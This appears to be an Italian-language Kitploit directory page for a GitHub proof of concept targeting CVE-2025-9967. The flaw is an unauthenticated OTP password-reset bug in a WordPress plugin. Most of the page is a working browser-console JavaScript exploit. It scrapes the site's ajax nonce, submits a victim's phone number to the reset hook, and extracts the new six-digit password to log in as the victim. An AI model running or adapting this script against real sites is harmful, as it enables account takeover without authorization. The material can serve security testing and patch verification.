Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-9967 — Exploit proof-of-concept per una vulnerabilità di reset password OTP non autenticata in WordPress, che consente agli attaccanti di reimpostare la password di una vittima senza credenziali. | Kitploit
Strumenti/GitHubGitHub/jfriedli/cve-2025-9967
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingAutenticazione
GitHubjfriedli/cve-2025-9967

CVE-2025-9967

Exploit proof-of-concept per una vulnerabilità di reset password OTP non autenticata in WordPress, che consente agli attaccanti di reimpostare la password di una vittima senza credenziali.

Vedi Repository
25 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Exploit: Reset password OTP non autenticato

PoC Console Browser (nessuna autenticazione richiesta)

root@kitploit:~
(async () => {
  async function getNonceAndAjaxUrl() {
    if (window.reset_pass_obj) {
      return { nonce: reset_pass_obj.ajax_nonce, ajaxUrl: reset_pass_obj.ajax_url };
    }

    const home = await fetch('http://localhost/wordpress/').then(r => r.text());
    const m = home.match(/reset_pass_obj\s*=\s*\{[^}]*"ajax_nonce":"([^"]+)"[^}]*"ajax_url":"([^"]+)"/);

    if (!m) {
      throw new Error('Could not find reset_pass_obj; open a frontend page and try again.');
    }

    const nonce = m[1].replace(/\\u002D/g, '-');
    const ajaxUrl = m[2].replace(/\\\//g, '/');

    return { nonce, ajaxUrl };
  }

  const { nonce, ajaxUrl } = await getNonceAndAjaxUrl();

  // Target victim phone (must match stored user meta)
  const mob = '5551234'; // without country code
  const cc  = '1';       // country code (no '+')

  const form = new URLSearchParams();
  form.set('action', 'ihs_otp_reset_ajax_hook');
  form.set('security', nonce);
  form.set('data[mob]', mob);
  form.set('data[country_code]', cc);

  const res = await fetch(ajaxUrl, {
    method: 'POST',
    headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
    body: form
  });

  const text = await res.text();
  console.log('Raw response:', text);

  let j;
  try {
    j = JSON.parse(text);
  } catch {
    throw new Error('Server did not return valid JSON');
  }

  const msg  = j?.data?.msg || '';
  const pass = (msg.match(/\b\d{6}\b/) || [])[0];

  console.log({
    success: j?.success,
    api: j?.data?.api,
    full_msg: msg,
    new_password: pass
  });

  if (pass) {
    console.log('Login:', 'http://localhost/wordpress/wp-login.php');
    console.log('Username: victim');
    console.log('Password:', pass);
  } else {
    console.warn('Password not found in response');
  }
})();
Scarica lo strumento